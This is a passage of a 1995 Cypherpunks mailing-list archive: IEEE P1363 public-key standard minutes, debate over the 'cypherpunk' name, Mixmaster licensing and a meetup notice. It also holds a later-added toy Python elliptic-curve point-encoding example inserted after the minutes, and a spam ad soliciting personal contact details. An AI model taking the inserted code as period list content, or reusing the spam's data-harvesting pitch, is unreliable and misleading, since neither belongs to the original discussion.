There have been proposals for crypto class libraries, most recently in Ray Cromwell's detailed plan for C++ crypto classes. Others I have been in communication with have expressed interest in doing the same thing in Smalltalk, given that many financial companies are doing a lot of their complicated transactions in Smalltalk. And Java has just entered the scene....

My point is not to argue for any particular language approach, or even to argue for this "ontology of digital money" as a Cypherpunks project, but to share with you some thoughts.

I think significant progress will have been achieved when these "financial objects" can be launched and used without a lot of hand-tuning and human intervention. In fact, an "economic microworld" of agents/actors interacting and trading in various forms of digital cash and derivatives would be an exciting "artificial life" example, and one which would test the robustness of protocols. I don't think this is beyond the current state of the art by too much.

I'm working on bits and pieces of this, but progress has been slow....

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From rsalz at osf.org Fri Sep 15 11:52:27 1995
From: rsalz at osf.org (Rich Salz)
Date: Fri, 15 Sep 95 11:52:27 PDT
Subject: Minutes of IEEE public-key standardization meeting
Message-ID: <9509151851.AA09047@sulphur.osf.org>

Date: Fri, 15 Sep 1995 11:08:56 -0800
From: rschlafly at attmail.com (Roger Schlafly)
Subject: Crypto '95 P1363 minutes
To: p1363 at RSA.COM

MINUTES

IEEE P1363: Standard for RSA, Diffie-Hellman, and Related Public-Key Cryptography

Burt Kaliski opened the meeting at 1:10 pm. The announced agenda was:

IEEE P1363: Standard for RSA, Diffie-Hellman and Related Public-Key Cryptography

MEETING NOTICE

Thursday, August 31, 1995, 1:00-6:00pm
Friday, September 1, 1995, 9:00-6:00pm
University of California, Santa Barbara, CA

This meeting of the P1363 working group, open to the public, will focus on the editing of a draft standard for RSA, Diffie-Hellman and other public-key cryptography. The meeting follows the CRYPTO '95 conference, held August 27-31 at the same location.

AGENDA

1. Approval of Agenda
2. Approval of Minutes from May Meeting
3. Officers' Reports
4. Update on Patent Issues
5. Proposals for New Sections
6. Meeting Schedule
7. Editorial Work (schedule to be determined based on availability of draft material)
8. New Work Assignments

Depending on the amount of editorial work, the meeting may end sooner than 6:00pm Friday.

If you'd like to participate, contact Burt Kaliski, the working group's chair, at RSA Laboratories, 100 Marine Parkway, Redwood City, CA 94065. Phone: (415) 595-7703, FAX: (415) 595-4126, E-mail: burt at rsa.com.

Draft sections and copies of previous minutes are available via anonymous ftp to ftp.rsa.com in the "pub/p1363" directory. The working group's electronic mailing list is ; to join, send e-mail to .

There will be a meeting fee, though the amount has not yet been established, pending arrangements with the university.
It will also be possible for participants to arrange accommodations at the university. DIRECTIONS (excerpted from the CRYPTO announcement) The campus is located approxmately two miles from the Santa Barbara airport, which is served by several airlines, including American, America West, United and US Air. All major rental car agencies are also represented in Santa Barbara, and AMTRAK has rail connections to San Francisco from the north and Los Angeles from the south. Santa Barbara is approximately 100 miles north of the Los Angeles airport, and 350 miles south of San Francisco. For more information on the CRYPTO '95 conference, contact Stafford Tavares, the general chair, at (613) 545-2945 or . In attendance, we had: Terry Arnold, Vice Chair Eric Blossom Jean-Francois Dhem *Whitfield Diffie Carl Ellison Amos Fiat Walter Fumy John Gilmore *Roger Golliver Chris Gorsuch David Grawrock Stuart Haber Aleksandar Jurisic *Burt Kaliski, Chair *John Kennedy Katherine T. Kislitzin Judy Koeller Ray Kopsa *Michael Markowitz *Alfred Menezes *Mark Oliver Paul Van Oorschot Minghua Qu *Roger Schlafly, Secretary Sherry Shannon *Jerry Solinas *Scott Vanstone Michael J. Wiener Harold M. Wilensky Roger Zuccherato Those marked with an asterisk were qualified to vote, having also attended 2 of the last 3 meetings (and thus 3 of 4, including this one). Motion 1: (Arnold, Kennedy) The agenda is approved. Passed, unanimously. Motion 2: (Arnold, Markowitz) Approve the minutes. Passed, unanimously. Kaliski reported that he is still trying to get registered OID numbers for us, but it will take the IEEE another six months to get its act together. We can proceed on the assumption that the numbers will be filled in later. Kaliski reported that the IEEE is setting up a web site to store drafts of standards online. The address is http://stdsbbs.ieee.org. When we (and IEEE) are ready, we will set up an area for our drafts. We can limit who can upload and download if we wish. 
Motion 3: (Oliver, Arnold) Make online documents publicly accessible to anyone. Passed, unanimously. Kaliski will set up a P1363 area on the SPA server, as soon as it is feasible. The other officers had nothing to report. Kaliski gave us a patent update. We still don't have the necessary assurances. One difficulty is the lawsuit between Cylink and RSA Data Security which may drag on for a while. There is also an arbitration proceeding between the two companies, with a ruling expected in a few weeks. The application for a waiver from the IEEE patent policy is still pending. Schlafly suggested amending the application letter to limit the waiver to the Stanford patents on the theory that the situation with the Stanford patents is more likely to be resolved in the near future. (Among other things, the Stanford patents expire much sooner than the MIT RSA patent.) When support for this position was weak, he proposed amending the application to make it clear that there is a stronger case for a waiver on the Stanford, so that if the IEEE chooses to reject our broad request, they will at least know that we could live with a narrower waiver. Others argued that a broad waiver gives our committee maximum freedom, and that we could decide later the extent to which we take advantage of the waiver. Motion 4: (Kennedy, Oliver) Leave waiver request as is. Passed, 7-3. Arnold raised the issue of the removal of a private key syntax from the elliptic curve draft. Motion 5: (Arnold, Gilmore) We introduce a representation of private keys into the standard. Passed, unanimously. Motion 6: (Arnold, Markowitz) Archiving and protecting private keys is outside our scope, and we should not include it in the body of the standard. Passed, unanimously. This motion leaves open the possibility of having advisory material on archiving private keys. This issue also provoked a discussion of syntax alternatives to ASN.1. 
Ellison argued that ASN.1 has a corrupting influence on the mind, and should be scrapped altogether. Kaliski said that there is no actual requirement that we use ASN.1, and that we could just use bit strings if we wished. No new sections were proposed. The next meeting was scheduled for the Crown Plaza hotel in Toronto, on Nov. 15-16, in conjunction with the Public Key Solutions (PKS) conference sponsored by Mobius. We discussed having the following meeting in conjunction with the RSA Data Security conference. That conference is at the Fairmount hotel, San Francisco, Jan. 17-19. Another possibility is in conjunction with ISOC in Feb. 22-23 at San Diego. Either way, the P1363 would probably be the two days before. We were unable to reach a consensus, so we deferred the issue to the next meeting. Markowitz assumed the role of treasurer again. The meeting fee was $60, or just $25 if only attending one day. Money for the dorms was also collected. At the request of the IEEE editors, we are moving our documents to Microsoft Word format. Our outline is now as follows.

1. Overview, scope, purpose
2. Standards references
3. Definitions
4. Elliptic curves
5. Bibliography

Appendices
A. Mathematical background
B. Supporting algorithms
C. Test vectors
D. Known state of attacks
E. Random numbers
F. Hardware support

Arnold expressed doubt as to whether the hardware support section was going to come together satisfactorily. So we changed the name of that section to "Other considerations" so that we could include other miscellaneous remarks. Ellison took over the random number section. He wanted to ditch some of the randomness tests as not being strong enough, and include some other explanatory material. At 3:00 we took a break until 3:35. The rest of the meeting was devoted to a detailed discussion of the elliptic curve draft. Menezes handed out a new copy. Solinas handed out a paper on elliptic curve point counting, to be included in appendix B.
It gives a nice way of choosing a curve with a predictable number of points. To make it more complete, he will add a couple of references, particularly to the forthcoming CRC handbook of applied cryptography, by Menezes, Van Oorschot, and Vanstone. Vanstone suggested switching the elliptic curve spec to multiplicative notation. Mathematicians prefer to use an additive notation because the curve is an abelian group. However, it is very confusing for cryptographers because the formulas are analogous to Diffie-Hellman and Elgamal protocols where the principal operation is multiplication in Zp. Motion 7: (Kennedy, Menezes) Stay with additive notation for elliptic curves, for consistency with the mathematical literature. Passed, unanimously. For various reasons, we decided that n, the order of the elliptic curve base point, should be required to be prime. Someone also thought "G" was better notation for the base point. Kaliski questioned the block splitting scheme in the ECES. Kennedy said it scored high on the hokey meter. At 9:10 Friday morning, the meeting resumed. The treasurer reported collecting $1662.70. This included $538.85 for dorm rooms and $1125 in IEEE fees. Kaliski demonstrated a cryptanalytic attack on these totals, as a way of verifying them. Vanstone gave an explanation of ECES. One rationale for the block splitting scheme is that a typical elliptic curve uses 160 bits for each of x and y. A triple DES key is 168 bits. A straightforward scheme would only use x, and thus not be able to encrypt the whole triple DES key. Using y would give 320 bits, but y is (nearly) a function of x, so there are some cryptographic subtleties in using y directly. In the end, we weren't that comfortable with it, so we decided to stick with a simpler one-block scheme. The simpler scheme just multiplies (or perhaps xors) the message by x. We took a break at 10:45. There was more criticism of ASN.1. 
Ellison offered to construct some simple data representations which would allow us to avoid ASN.1. Kaliski suggested that an elliptic curve point (x,y) with possible compressed y could be represented by

[ x bytes ] 00
[ x bytes ] 01
[ x bytes ] 80 [ y bytes ]

That is, the last line is for the full x and y. If y is compressed down to one bit, the first or second line is used. Kaliski argued against the signature schemes directly referencing a hashing operation. Someone may want to sign something other than a hash value. An implementation may want to conform without having a hash function built-in. Solinas objected that there are risks to signing data other than hash values. This issue was not resolved. Solinas complained that there are various parameters buried in the draft without any indication as to how these are related to overall security. He volunteered to write some notes on how the various parameters were related to each other. How these are incorporated is to be determined. Someone pointed out we should check r = 0 or s = 0 in the signature schemes. At 12:20 we took a break for lunch, until 1:45. Vanstone gave a talk and handout on key agreement protocols. He showed how he and Menezes found weaknesses in other Diffie-Hellman type protocols, and they proposed a new one that overcomes the problems. We all liked it. We thought q and n should be part of the system parameter setup. There was some discussion of optimal normal bases versus using an irreducible polynomial. We also discussed advantages of restricting to p = 3 mod 4, and to curves with a = -3. At 3:20 we took a break until 3:30. Ellison handed out some introductory material on random numbers that he wrote since taking over the job the day before. The plan now is to have a draft standard at the next (Nov.) meeting, and then to polish it up for ballot at the following meeting. We adjourned at 4:20.
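Added here as an illustration, not part of the minutes or of any P1363 draft: a toy implementation of the "x, tag byte, optional y" point encoding Kaliski sketched above, together with the decompression step that the p = 3 mod 4 restriction makes cheap (a square root in F_p is then the single exponentiation z^((p+1)/4)). Assumptions of my own: the curve y^2 = x^3 + x + 1 over F_23 is a textbook toy, not any standard curve; the "one bit" of compressed y is taken to be its low bit, which the minutes leave unspecified; field elements are one byte wide. Note that the tag follows x here, as in the minutes, rather than preceding it as in the later SEC 1 prefix-byte convention. The decoder rejects an x that is not the abscissa of any point, a y of the wrong parity (only possible when y = 0), a received uncompressed y that is not on the curve, and malformed lengths, which are the checks a conforming implementation would need.

```python
# Added example (not P1363 code): point compression on a toy curve.
# Curve: y^2 = x^3 + A*x + B over F_P, with P = 3 (mod 4) so that the
# square root of a quadratic residue z is the single exponentiation
# z^((P+1)/4). Constructed for illustration; P = 23 is a textbook toy.
P, A, B = 23, 1, 1
FIELD_BYTES = 1          # assumption: elements of F_23 fit in one byte

# Tag bytes as proposed in the minutes: they FOLLOW the x bytes.
TAG_Y_EVEN, TAG_Y_ODD, TAG_FULL = 0x00, 0x01, 0x80


def is_on_curve(x, y):
    """True iff (x, y) is a reduced affine point satisfying the curve equation."""
    return 0 <= x < P and 0 <= y < P and (y * y - (x ** 3 + A * x + B)) % P == 0


def mod_sqrt(z):
    """Square root of z in F_P, or None if z is a non-residue. Needs P = 3 (mod 4)."""
    z %= P
    r = pow(z, (P + 1) // 4, P)
    return r if (r * r) % P == z else None   # the exponent gives garbage for non-residues


def encode_point(x, y, compress=True):
    """Serialise as  x || 00/01  (compressed, low bit of y)  or  x || 80 || y."""
    if not is_on_curve(x, y):
        raise ValueError("point is not on the curve")
    xb = x.to_bytes(FIELD_BYTES, "big")
    if compress:
        return xb + bytes([TAG_Y_ODD if y & 1 else TAG_Y_EVEN])
    return xb + bytes([TAG_FULL]) + y.to_bytes(FIELD_BYTES, "big")


def decode_point(data):
    """Parse the encoding back into (x, y), validating every field."""
    if len(data) < FIELD_BYTES + 1:
        raise ValueError("encoding too short")
    x = int.from_bytes(data[:FIELD_BYTES], "big")
    tag = data[FIELD_BYTES]
    if x >= P:
        raise ValueError("x is not a reduced field element")
    if tag == TAG_FULL:
        if len(data) != 2 * FIELD_BYTES + 1:
            raise ValueError("uncompressed encoding has wrong length")
        y = int.from_bytes(data[FIELD_BYTES + 1:], "big")
        if not is_on_curve(x, y):          # never trust a received y
            raise ValueError("point is not on the curve")
        return x, y
    if tag not in (TAG_Y_EVEN, TAG_Y_ODD) or len(data) != FIELD_BYTES + 1:
        raise ValueError("bad tag or wrong length for compressed encoding")
    y = mod_sqrt(x ** 3 + A * x + B)
    if y is None:
        raise ValueError("x is not the abscissa of any curve point")
    if (y & 1) != tag:
        y = (P - y) % P                    # take the other root; % P keeps y = 0 at 0
    if (y & 1) != tag:                     # only reachable for y = 0 with tag 01
        raise ValueError("no curve point has that x and y parity")
    return x, y


def try_decode(data):
    """decode_point, returning None instead of raising (for tests and fuzzing)."""
    try:
        return decode_point(data)
    except ValueError:
        return None


def round_trip_all():
    """Enumerate every affine point, round-trip it both ways, return the point count."""
    count = 0
    for x in range(P):
        for y in range(P):
            if not is_on_curve(x, y):
                continue
            assert decode_point(encode_point(x, y, True)) == (x, y)
            assert decode_point(encode_point(x, y, False)) == (x, y)
            count += 1
    return count


if __name__ == "__main__":
    print(encode_point(3, 10).hex(), encode_point(3, 10, False).hex())
    print(decode_point(bytes([0x03, 0x01])), round_trip_all())
```

On this curve x = 4 gives y = 0, so the tag 01 form of x = 4 names no point and must be rejected rather than silently mapped to (4, 0); x = 2 gives a non-residue on the right-hand side and must be rejected as well. The same two checks are what a 160-bit implementation needs, only with a bigger p.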
From rishab at dxm.org Fri Sep 15 11:58:47 1995 From: rishab at dxm.org (Rishab Aiyer Ghosh) Date: Fri, 15 Sep 95 11:58:47 PDT Subject: "Use implies consent to monitoring" Message-ID: <199509151853.LAA10932@infinity.c2.org> In the InterNIC notice on fees for domain names that marks the end of an era, (http://rs.internic.net/announcements/fee-policy.html) I noticed this gem of a postscript: Please be advised that use constitutes consent to monitoring (Elec Comm Priv Act, 18 USC 2701-2711). ---------------------------------------------------------------------- The Indian Techonomist - newsletter on India's information industry http://dxm.org/techonomist/ rishab at dxm.org Editor and publisher: Rishab Aiyer Ghosh rishab at arbornet.org Vox +91 11 6853410; 3760335; H 34 C Saket, New Delhi 110017, INDIA From trei at process.com Fri Sep 15 12:15:22 1995 From: trei at process.com (Peter Trei) Date: Fri, 15 Sep 95 12:15:22 PDT Subject: CYPHERPUNK considered harmful. Message-ID: <9509151915.AA16093@toad.com> -----BEGIN PGP SIGNED MESSAGE----- Tim writes: >Indeed, some people here have been calling themselves by various names >("CypherGeek," "Crypto Rebel," etc.) for a long time. Personally, I despise >the terms "geek," "dweeb," and "nerd," and think anyone who calls themselves >by these insults is not "reclaiming and deconstructing the labels of the >oppressor class," as the slogan goes, but is merely insulting themselves. >Blacks who call themselves "niggers," homosexuals who call themselves >"queers," and computer programmers who call themselves "geeks" and "dorks" >are all playing the same game. I fail to see how you can write this, and then claim it's OK to call yourself a 'punk'. >A better approach is for the "conservatives" who want a "more conservative" >name to simply do what I suggested: form a new group and name it what they >like. They wouldn't have to quit this list, they would just be able to >cleanly recruit for their new list. >Seems simple to me. And honest. 
And less divisive than trying to change the >name of a group with a long history (by modern standards) and with several >well-known achievements. Who is trying to be dishonest, and what are they trying to be dishonest about? I'm really confused by this. Tim, I don't want to take your toy away, or minimize the achievements of the cypherpunks (among whom I somewhat presumptively include myself). OK. Let's NOT drop the term 'cypherpunk'. However, I do think we need to have available another term for 'people with our interests' if we're going to have maximal effectiveness. What follows is my original followup, written last night. - --------------------------------------------------------------- I've gotten a number of responses to my post 'Cypherpunk considered harmful." It's pretty clear that a lot of people did not really understand what I was getting at. This is my fault. I'll try to clarify. What is the situation on the ground, here in mid September 1995? It's utterly clear that the US and other governments are dead set against the widespread use of strong, unencumbered crypto. 'They' are using many different (and weak) pretexts to delay or prevent its incorporation into commercial software. If there is a hidden state agenda, 'our' belief is it is that the state wishes to retain its current ability to spy unseen on the citizenry, wiretapping with or without warrants, and examine stored information without the cooperation of the owner. The general 'cypherpunk viewpoint', if I may generalize, is diametrically opposite: It's not really a hidden agenda, since frequent rants make it pretty clear.
Since we're not a unified command and control system like the state, different cypherpunks have different goals, but I hazard that most would agree with: 'Strong, unencumbered cryptography is an empowerment tool for the electronic age; it strengthens the individual in relation to the state, allowing him (or her) to communicate privately, and store his data as securely as if it resided in his own head. The widespread use of strong cryptography will lead to social changes that we regard as desirable.' If you accept this arguably paranoid vision of our situation, then it's clear that we are in a battle for the hearts and minds of the people: The State wants to convince people that their safety and prosperity lies in trusting Big Brother to watch over and take care of them, and nothing but danger lies outside of BB's line of sight. The cypherpunks take a much more libertarian viewpoint; that the state is already too strong and intrusive, and that cryptography will not only allow us to engage in commerce and protect ourselves against crime, it will also allow us to act outside of improper state control. But time is running out. All the state has to do is convince people that strong unescrowed encryption is needed only by criminals - if you trust the state, there is no reason to object to it being able to listen in - after all, all laws are reasonable, and the state won't listen in without a warrant. 'We' have a harder task. We need to convince people that they need encryption - it will protect us against criminals, snoops, and hackers, and the state's proposals will not do this. It's a much more subtle thesis, without the easy emotional hooks that can be exploited by the state to promote its position. I don't think we can turn people into libertarians, and then get them to adopt cryptography to protect themselves from the statists. At least, not enough people to count in the short term, and the short term is where we need to focus at the moment.
I *do* think we can persuade people that they need cryptography to protect themselves against criminals, and that the government's proposed standards for key length limits and key escrow will make the crypto so weak and insecure that it will cause more crime than it will prevent. That's a critical point - that the individual can, without difficulty, use cryptography to protect him or herself against criminals more effectively than he could by relying on the state. The memes we want to propagate are

1. "I need strong unescrowed cryptography to protect myself against criminals." If we can convince a large portion of the population of this (and we have truth on our side), we'll be well on our way.

2. "The government's initiatives on encryption, while they may be well-intentioned, are worse than useless, and will endanger me and my loved ones." If we can get this through the public's collective head as well, we'll have won the battle.

This goal is where the 'cypherpunk considered harmful' title comes from. I want to propagate these ideas. If I go up to an average person and tell them "The State is working to ensure that it can spy on your every communication, and can't be trusted to follow its own rules for doing so. Use cryptography to help promote cryptoanarchy!", he will usually dismiss me as a nutcase. If I say "Criminals and hackers can tap your internet communications, defraud your cell phone account, eavesdrop on your calls, impersonate you, steal your credit card numbers, and spy on your business secrets. I can tell you how you can easily prevent this", then he is interested, and wants to know more. Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as nutcases for many people, and are a barrier to getting our ideas across. I'm not saying this pigeonholing is correct - in fact I despise people who judge a book by its cover, but so many people DO make such snap judgements that we need to take this into account when talking to the general public.
For those who have responded, *I* do not have a problem with the term cypherpunk. However, I know that there are many people who do, people we want on our side. I propose that in communicating with the cryptographic laity, we should be emphasizing the anti-crime aspects of crypto, as well as its enabling impact on commerce and the American software industry. We'll get a lot more converts with this approach than we would by emphasizing the political aspects of cypherpunk, no matter how important we think they are. Think about it. Which future would you rather see:

1. Lots of people demanding strong unescrowed crypto for what you consider rather peripheral and politically unaware reasons, which you have educated them in.

2. Unescrowed crypto banned, with those who promote it considered aiders and abettors of the four horsemen, (but boy are they ideologically pure!).

Peter Trei I probably won't see any responses till Monday. I'm going for a weekend at a resort on Lake Winnipesaukee. If you need me, I'll be in the hot tub. :-) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFmmK1QxhKXe9s8VAQE+tgP+NcKdGvBeJpa8AHGr/RhKCHudZP2qmRNP J699UCCvN006ywIjurjuis48VPj26uxBkcRbeuzNxGlKmZqXIkS0vEcFjrrZhBsK V9dLFFGTZ6JG3nK++mleW1wQB/F0azXXvXKJWa6R+Tnj1oo2ADUxGNQMs9IVmgR3 zsyK3fej+IQ= =YqDH -----END PGP SIGNATURE----- Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From loki at obscura.com Fri Sep 15 12:37:02 1995 From: loki at obscura.com (Lance Cottrell) Date: Fri, 15 Sep 95 12:37:02 PDT Subject: Mixmaster status Message-ID: At 5:58 AM 9/15/95, Russell Nelson wrote: > While I have not discussed it, I can not imagine that there would not also > be a free version of the server code (with source). Without remailers what > is the point of the client software? > >I'm confused here. Isn't every copy of mixmaster potentially a client >and/or server?
That seems to me to be one of the beautiful aspects of >mixmaster -- run a remailer and you greatly increase your own privacy. > > I would like to see that continue, although I think that the Windows and Mac versions are likely to be client only. Since I am putting my reputation behind those statements, I don't want to box myself in. -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From Chris.Claborne at SanDiegoCA.ATTGIS.COM Fri Sep 15 12:39:37 1995 From: Chris.Claborne at SanDiegoCA.ATTGIS.COM (Chris Claborne) Date: Fri, 15 Sep 95 12:39:37 PDT Subject: San Diego Cypherpunks Physical Meeting Message-ID: <9509151530.aa12455@ncrhub1.ATTGIS.COM> San Diego Area CPUNKS symposium Thursday, Sep. 21, 1995 Invitation to all Cypherpunks to join the San Diego crowd at "The Mission Cafe & Coffee Shop" where I hope to get an update of Lance Cottrell's new anonymous e-mail server, "mixmaster", and exchange keys. Don't forget to bring your public key fingerprint. If you can figure out how to get it on the back of a business card, that would be cool. Hopefully Lance Cottrell will give us an update on Mixmaster 2.0.2 Place: The Mission Cafe & Coffee Shop 3795 Mission Bl in Mission Beach. 488-9060 Time:1800 Their Directions: 8 west to Mission Beach Ingram Exit Take west mission bay drive Go right on Mission Blvd. On the corner of San Jose and mission blvd. It is located between roller coaster and garnett. It's kind of 40s looking building... funky looking (their description, not mine) They serve stuff to eat, coffee stuff, and beer. See you there! New guy, bring your fingerprint.
Drop me a note if you plan to attend. NOTE: My e-mail address, "chris.claborne at sandiegoca.attgis.com" permanently replaces my .ncr.com address. Both addresses work for now but the NCR address will eventually be killed. 2 -- C -- ... __o .. -\<, Chris.Claborne at SanDiegoCA.ATTGIS.Com ...(*)/(*). CI$: 76340.2422 http://bordeaux.sandiegoca.attgis.com/ PGP Pub Key fingerprint = A8 FA 55 92 23 20 72 69 52 AB 64 CC C7 D9 4F CA Avail on Pub Key server. PGP-encrypted e-mail welcome! From futplex at pseudonym.com Fri Sep 15 12:48:28 1995 From: futplex at pseudonym.com (Futplex) Date: Fri, 15 Sep 95 12:48:28 PDT Subject: Commercial Mixmaster (was Re: Mixmaster status) In-Reply-To: Message-ID: <9509151948.AA27938@cs.umass.edu> Anonymous writes: # Consider this scenario ... Mixmaster get's bought by the Acme # Crypto Company of Ft. Meade, MD. They "improve" it, and offer a new # version. It's even FREE (for non-commerical use)! But their # "improvements" make it incompatible with previous versions, and so # you have to upgrade. The new "commercial" version comes with no # SOURCE CODE, of course... Lance Cottrell writes: > 4) There will always be a free version of the client with source code. > > While I have not discussed it, I can not imagine that there would not also > be a free version of the server code (with source). Without remailers what > is the point of the client software? Beyond taking Lance on his PGP-signed-word, which I'm strongly inclined to do, I suspect he may not have much legal leeway in this regard. With the caveat that I Am Not A Lawyer, it seems to me that the GNU General Public License (Version 1 from 1989, Mix/GNU.license in the Mixmaster .tar or http://hopf.math.nwu.edu/docs/Gnu_License), which covers all extant distributions of Mixmaster, has some significant implications for any commercial development of Mixmaster.
It's applicable to "the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language". The GNU GPL specifies that: 2. You may modify your copy or copies of the Program or any portion of it, and copy and distribute such modifications under the terms of Paragraph 1 above, provided that you also do the following: [...] b) cause the whole of any work that you distribute or publish, that in whole or in part contains the Program or any part thereof, either with or without modifications, to be licensed at no charge to all third parties under the terms of this General Public License (except that you may choose to grant warranty protection to some or all third parties, at your option). and that: 3. You may copy and distribute the Program (or a portion or derivative of it, under Paragraph 2) in object code or executable form under the terms of Paragraphs 1 and 2 above provided that you also do one of the following: a) accompany it with the complete corresponding machine-readable source code, [...] or, b) accompany it with a written offer, [...] to give any third party free (except for a nominal charge for the cost of distribution) a complete machine-readable copy of the corresponding source code, [...] So it looks to me as though Mixmaster source code will continue to be legally available, no matter what.... Better informed interpretations are enthusiastically solicited. -Futplex From janet.dove at ledip.py Fri Sep 15 13:00:37 1995 From: janet.dove at ledip.py (Janet Dove) Date: Fri, 15 Sep 95 13:00:37 PDT Subject: ===>> FREE 1 yr. Magazine Sub sent worldwide- 315+ Popular USA Titles Message-ID: Hi fellow 'netters, My name is Janet Dove and I recently started using a magazine subscription club in the USA that has a FREE 1 yr. magazine subscription deal with your first paid order- and I have been very pleased with them. 
They have over 1,500 different USA titles that they can ship to any country on a subscription basis. As for computer magazines from the USA, they have more of a selection than I ever knew even existed. They have magazines for most every area of interest in their list of 1,500 titles. Within the USA, for their USA members, they are cheaper than all their competitors and even the publishers themselves. This is their price guarantee. Overseas, on the average, they are generally around one-fourth to one-half of what the newsstands overseas charge locally for USA magazines. On some titles they are as little as one-tenth of what the newsstands charge. They feel that magazines should not be a luxury overseas. In the USA, people buy magazines and then toss them after reading them for just a few minutes or hours. They are so cheap in the USA! Well, this company would like to make it the same way for their overseas members. They are also cheaper than all their competitors in the USA and overseas, including the publishers themselves! This is their price guarantee. Around one-half their business comes from overseas, so they are very patient with new members who only speak limited English as a 2nd language. Their prices are so cheap because they deal direct with each publisher and cut-out all the middlemen. They will send you their DELUXE EMAIL CATALOGUE (around 400K-big and juicy) !)...if you completely fill out the form below. It has lists of all the freebies, lists of all the titles they sell, titles broken down by categories and detailed descriptions on nearly 1000 of the titles that they sell. Please do not email me as I am just a happy customer and a *busy* student. I don't have time to even complete my thesis in time, let alone run my part-time software business!
Email them directly at: suzanne at grfn.org

*------------cut here-----------------------------------------------*
REQUEST FOR MORE INFO: please copy this section only and email to: suzanne at grfn.org (sorry, but incomplete forms *cannot* be acknowledged)
Name:
Internet email address:
Smail home address:
City-State-Zip:
Country:
Work Tel. #:
Work Fax #:
Home Tel. #:
Home Fax #:
Name of USA mags you currently get on the newsstand or in the store:
Name of USA mags you currently get on a subscription basis, through the mail:
Name of USA mags you would like price quotes on when we call you:
Catalogue format desired from below 2 choices (list "1" or "2"): (1. 22-part email message; 2. attached file by email)
{{{Note- 22-part email can be received by anyone with any computer. Attached file format may not be for you: it is sent as an uncompressed 400K file formatted in Microsoft Word text only format, on a Mac; if you don't use Microsoft Word on a Mac - you will have to know how to convert into a usable text format. We cannot help you with this. If in doubt, we suggest you go with the universally acceptable 22-part email message. You can always manually spend a few minutes pasting the parts into one whole.}}}
If you saw this on a newsgroup, which newsgroup did you see it on?:
How did you hear about us (name of person who referred you or the area of the internet that you saw us mentioned in):
Janet Dove 091495
*------------cut here-----------------------------------------------*

They guarantee to beat all their competitors' prices. Sometimes they are less than half of the next best deal I have been able to find and other times, just a little cheaper - but I have never found a lower rate yet. They assured me that if I ever do, they will beat it. They have been very helpful and helped me change my address from the USA to Finland and then back again when I moved last month. They are very knowledgeable about addressing mags worldwide.
They have a deal where you can get a free 1 yr. sub to a new magazine from a special list of over 300 popular titles published in the USA. They will give you this free 1 yr. sub when you place your first paid order with them to a renewal or new subscription to any of the over 1,500 different popular USA titles they sell. They can arrange delivery to virtually any country and I think they have clients in around 35 or 36 countries now. Outside the USA there is a charge for foreign postage and handling (on both paid and freebie subs) that varies from magazine to magazine. I have found their staff to be very friendly and courteous. They even helped me with an address change when I moved from one country to another. The owner thinks of his service as a "club" and his clients as "members" (even though there is no extra fee to become a member - your first purchase automatically makes you a member) and he is real picky about who he accepts as a new member. When he sets you up as a new member, he himself calls you personally on the phone to explain how he works his deal, or sometimes he has one of his assistants call. He is kind of quirky sometimes - he insists on setting up new members by phone so he can say hi to everyone (I sure wouldn't want to have his phone bills!), but you can place future orders (after your first order) via E-mail. He has some really friendly young ladies working for him, who seem to know just as much as he does about this magazine stuff. If you live overseas, he will even call you there, as long as you are interested, but I think he still makes all his overseas calls on the weekends, I guess cause the long distance rates are cheaper then. He only likes to take new members from referrals from satisfied existing members and he does virtually no advertising. When I got set-up, they had a 2-3 week waiting list for new members to be called back so that they could join up. (Once you are an existing member, they help you immediately when you call. 
) I think they are able to get back to prospective new members the same day or within a few days now, as they have increased their staff. I am not sure about this.........but if you email the above form to them, that is the way to get started! They will send you some FREE info. via E-mail (the short version (around 40K) of their catalogue, or if you request it the DELUXE LONG VERSION (around 400K-big and juicy) !)...if you fill out the form near the top of this message. They then send you email that outlines how his club works and the list of free choices that you can choose from, as well as the entire list of what he sells; and then they will give you a quick (3-5 minute) friendly, no-pressure no-obligation call to explain everything to you personally and answer all your questions. Once you get in, you'll love them. I do. For more info, just fill out the form near the top of this message and email it to: suzanne at grfn.org Sincerely, Janet Dove From tcmay at got.net Fri Sep 15 13:34:24 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 15 Sep 95 13:34:24 PDT Subject: CYPHERPUNK considered harmful. Message-ID: At 3:25 PM 9/15/95, Peter Trei wrote: >Tim, I don't want to take your toy away, or minimize the achievements It's not "my toy" for anyone to take away. The burden of proof lies with those who want the name "Cypherpunks" changed, not those who are happy to let things go as they've been going. Look, you've written a couple of long pieces explaining why a more conservative name would be better, I've written some pieces on why it's not a very workable idea, and yet I doubt anyone on the list has changed their views. Or at least only a very tiny fraction. The point being that things gain inertia, just the way it is. History counts. Names stick. But if you and your followers wish to change things, go ahead and have a schism. That's what the Protestants did, once they realized the Catholic Church wouldn't be changing its system anytime soon.
